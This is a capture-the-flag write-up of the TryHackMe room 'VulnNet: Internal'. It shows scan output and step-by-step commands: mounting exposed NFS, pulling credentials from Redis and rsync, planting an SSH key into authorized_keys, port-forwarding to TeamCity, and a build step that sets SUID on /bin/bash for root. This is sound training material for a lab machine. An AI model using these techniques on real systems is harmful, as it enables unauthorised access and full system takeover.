TryHackMe | Vulnet-Internal

A room on TryHackMe created by TheCyb3rW0lf featuring various services to exploit.

Vulnet : Internal

Tasks

• services flag
• internal flag
• user flag
• root flag

Vulnerabilities

• Sensitive files in SMB share with Anonymous Login.
• Leaving credentials in files.
• Sensitive files and credentials in Redis
• Normal user able to read sensitive logs when they should not be.

NMAP

PORT     STATE    SERVICE     REASON      VERSION
22/tcp   open     ssh         syn-ack     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 5e:27:8f:48:ae:2f:f8:89:bb:89:13:e3:9a:fd:63:40 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDagA3GVO7hKpJpO1Vr6+z3Y9xjoeihZFWXSrBG2MImbpPH6jk+1KyJwQpGmhMEGhGADM1LbmYf3goHku11Ttb0gbXaCt+mw1Ea+K0H00jA0ce2gBqev+PwZz0ysxCLUbYXCSv5Dd1XSa67ITSg7A6h+aRfkEVN2zrbM5xBQiQv6aBgyaAvEHqQ73nZbPdtwoIGkm7VL9DATomofcEykaXo3tmjF2vRTN614H0PpfZBteRpHoJI4uzjwXeGVOU/VZcl7EMBd/MRHdspvULJXiI476ID/ZoQLT2zQf5Q2vqI3ulMj5CB29ryxq58TVGSz/sFv1ZBPbfOl9OvuBM5BTBV
|   256 f4:fe:0b:e2:5c:88:b5:63:13:85:50:dd:d5:86:ab:bd (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNM0XfxK0hrF7d4C5DCyQGK3ml9U0y3Nhcvm6N9R+qv2iKW21CNEFjYf+ZEEi7lInOU9uP2A0HZG35kEVmuideE=
|   256 82:ea:48:85:f0:2a:23:7e:0e:a9:d9:14:0a:60:2f:ad (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJPRO3XCBfxEo0XhViW8m/V+IlTWehTvWOyMDOWNJj+i
111/tcp  open     rpcbind     syn-ack     2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3           2049/udp   nfs
|   100003  3           2049/udp6  nfs
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100005  1,2,3      38337/tcp6  mountd
|   100005  1,2,3      40435/udp   mountd
|   100005  1,2,3      46762/udp6  mountd
|   100005  1,2,3      56457/tcp   mountd
|   100021  1,3,4      40452/udp6  nlockmgr
|   100021  1,3,4      41523/tcp6  nlockmgr
|   100021  1,3,4      42869/udp   nlockmgr
|   100021  1,3,4      43173/tcp   nlockmgr
|   100227  3           2049/tcp   nfs_acl
|   100227  3           2049/tcp6  nfs_acl
|   100227  3           2049/udp   nfs_acl
|_  100227  3           2049/udp6  nfs_acl
139/tcp  open     netbios-ssn syn-ack     Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open     netbios-ssn syn-ack     Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
873/tcp  open     rsync       syn-ack     (protocol version 31)
2049/tcp open     nfs_acl     syn-ack     3 (RPC #100227)
9090/tcp filtered zeus-admin  no-response
Service Info: Host: VULNNET-INTERNAL; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -39m59s, deviation: 1h09m16s, median: 0s
| nbstat: NetBIOS name: VULNNET-INTERNA, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
|   VULNNET-INTERNA<00>  Flags: <unique><active>
|   VULNNET-INTERNA<03>  Flags: <unique><active>
|   VULNNET-INTERNA<20>  Flags: <unique><active>
|   WORKGROUP<00>        Flags: <group><active>
|   WORKGROUP<1e>        Flags: <group><active>
| Statistics:
|   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|_  00 00 00 00 00 00 00 00 00 00 00 00 00 00
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 21990/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 46838/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 19384/udp): CLEAN (Failed to receive data)
|   Check 4 (port 39015/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: vulnnet-internal
|   NetBIOS computer name: VULNNET-INTERNAL\x00
|   Domain name: \x00
|   FQDN: vulnnet-internal
|_  System time: 2021-05-14T15:40:20+02:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-05-14T13:40:20
|_  start_date: N/A

From our Nmap scan we can see a lot of services port are open such as samba and NFS. Usually my first step is to check the web server but since we don’t have one we can check out the SMB server first.

Enum4linux

========================================= 
|    Share Enumeration on 10.10.106.60    |
 ========================================= 
    Sharename       Type      Comment
    ---------       ----      -------
    print$          Disk      Printer Drivers
    shares          Disk      VulnNet Business Shares
    IPC$            IPC       IPC Service (vulnnet-internal server (Samba, Ubuntu))

I used a tool called Enum4linux that is used to enumerate SMB, you can also use other preferred tools to do this. We can connect to the ‘shares’ share using SMBclient. In there we will find some sensitive information and our first flag.

NFS

Next we’ll proceed with the NFS server, but what is actually NFS?

• It is a client/server system that allows users to access files across a network and treat them as if they resided in a local file directory
• We can use this command to mount NFS on a mount point.

showmount -e $IP
mkdir /tmp/NFS
sudo mount -t nfs $IP:/opt/conf /tmp/NFS

showmount -e $IP will show us the file names that are available on the server.Then we create a mount point and mount it, we can then navigate to the mounted file to view it.After looking around a bit, I found some interesting stuff in redis.conf

requirepass "B65Hx562F@ggAZ@F"

Seem’s like a password to redis-server

Redis

Before diving into redis, what is it actually?

• Redis is an in-memory data structure store, used as a distributed, in-memory key–value database, cache and message broker, with optional durability.
• We can connect through redis-cli

redis-cli -h $IP

Enter the password we found using AUTH or supply -a in the initial command followed by the password

• Since Redis uses key-value database, let’s get all keys using KEYS *

10.10.106.60:6379> KEYS *
1) "internal flag"
2) "authlist"
3) "marketlist"
4) "tmp"
5) "int"

Our second flag and some sensitive information but particularly ‘authlist’. Checking out the type of authlist it seems like a list.

• Use lrange to list out authlist

QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg==
QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg==
QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg==

• Using Cyberchef it is indeed Base64 encoded.

Authorization for rsync://rsync-connect@127.0.0.1 with password Hcg3HP67@TW@Bc72v

Rsync

• Rsync, or Remote Sync, is a free command-line tool that lets you transfer files and directories to local and remote destinations. Rsync is used for mirroring, performing backups, or migrating data to other server
• Let’s list out files inside the server using this command:

rsync $IP::

• Let’s try to connect to the server using rsync

rsync $IP::files
Password: 
@ERROR: auth failed on module files
rsync error: error starting client-server protocol (code 5) at main.c(1814) [Receiver=3.2.3]

Weird, we’re unable to connect even though with the correct password.

• Let’s try to copy all the files instead

rsync -av rsync://rsync-connect@$IP/files ctf_files

-a means archive while -v is verbose.

• Opening up the copied files we have sys-internal which is the user’s home where we will find user.txt
• There is a .ssh folder where we can put our public key.
• We can create a ssh key with ssh-keygen

rsync -av .ssh/id_rsa.pub rsync://rsync-connect@$IP/files/sys-internal/.ssh/authorized_keys

Later we can login using the private key.

Privesc

• We don’t know the password for sys-internal but we can upload and run linpeas.sh
• Unfortunately no SUIDs or Cronjobs was found that can be exploited.
  I had to refer to a write-up for this privesc. Apparently it uses port forwarding.

sys-internal@vulnnet-internal:~$ ss -tno
State          Recv-Q      Send-Q                 Local Address:Port                  Peer Address:Port                                
ESTAB          0           84                      10.10.106.60:2049                   10.17.1.163:982         timer:(on,744ms,0)      
ESTAB          0           108                     10.10.106.60:22                     10.17.1.163:47754       timer:(on,784ms,0)      
ESTAB          0           0                 [::ffff:127.0.0.1]:59073           [::ffff:127.0.0.1]:8111                                
CLOSE-WAIT     1           0                 [::ffff:127.0.0.1]:58999           [::ffff:127.0.0.1]:8111                                
ESTAB          0           0                 [::ffff:127.0.0.1]:8111            [::ffff:127.0.0.1]:59073

Let’s try to get something on port 8111

sudo ssh sys-internal@10.10.106.60 -i .ssh/id_rsa -L 8111:127.0.0.1:8111

We can now navigate to webpage on http://127.0.0.1:8111 which brings us to a login page for TeamCity.

• Perhaps there is more on this SSH server. Navigating to / there is a TeamCity directory,there’s a lot of directories and files in there but one interesting directory for us CTF players are the logs. They were a lot of logs but I was most interested in the catalina.out and teamcity-auth.log

[TeamCity] Super user authentication token: 8446629153054945175 (use empty username with the token as the password to access the server)
[TeamCity] Super user authentication token: 8446629153054945175 (use empty username with the token as the password to access the server)
[TeamCity] Super user authentication token: 3782562599667957776 (use empty username with the token as the password to access the server)
[TeamCity] Super user authentication token: 5812627377764625872 (use empty username with the token as the password to access the server)
[TeamCity] Super user authentication token: 1966994702089781692 (use empty username with the token as the password to access the server)
[TeamCity] Super user authentication token: 1966994702089781692 (use empty username with the token as the password to access the server)
[TeamCity] Super user authentication token: 1966994702089781692 (use empty username with the token as the password to access the server)
[TeamCity] Super user authentication token: 1966994702089781692 (use empty username with the token as the password to access the server)
[TeamCity] Super user authentication token: 1966994702089781692 (use empty username with the token as the password to access the server)
[TeamCity] Super user authentication token: 1966994702089781692 (use empty username with the token as the password to access the server)
[TeamCity] Super user authentication token: 1966994702089781692 (use empty username with the token as the password to access the server)

After looking around, I found multiples tokens for super user and tried all of them and one of them worked out.

• Now let’s manually create a project and next create a build configuration for the project.
• Now navigate back to the project and edit the configuration for the build. Next, add a build step and choose the Command Line for the type. Now create a malicious script, assuming this super user account can perform root privileges, let’s set bash as a SUID

chmod u+s /bin/bash

Now let’s run our project and see the permissions of bash now.

bash-4.4$ ls -l /bin/bash
-rwsr-xr-x 1 root root 1113504 Apr  4  2018 /bin/bash

Now simply run the binary to get root privileges

bash-4.4$ /bin/bash -p
bash-4.4# whoami
root

In the end this was an interesting room and I learned a lot about internal services and a new way for privesc.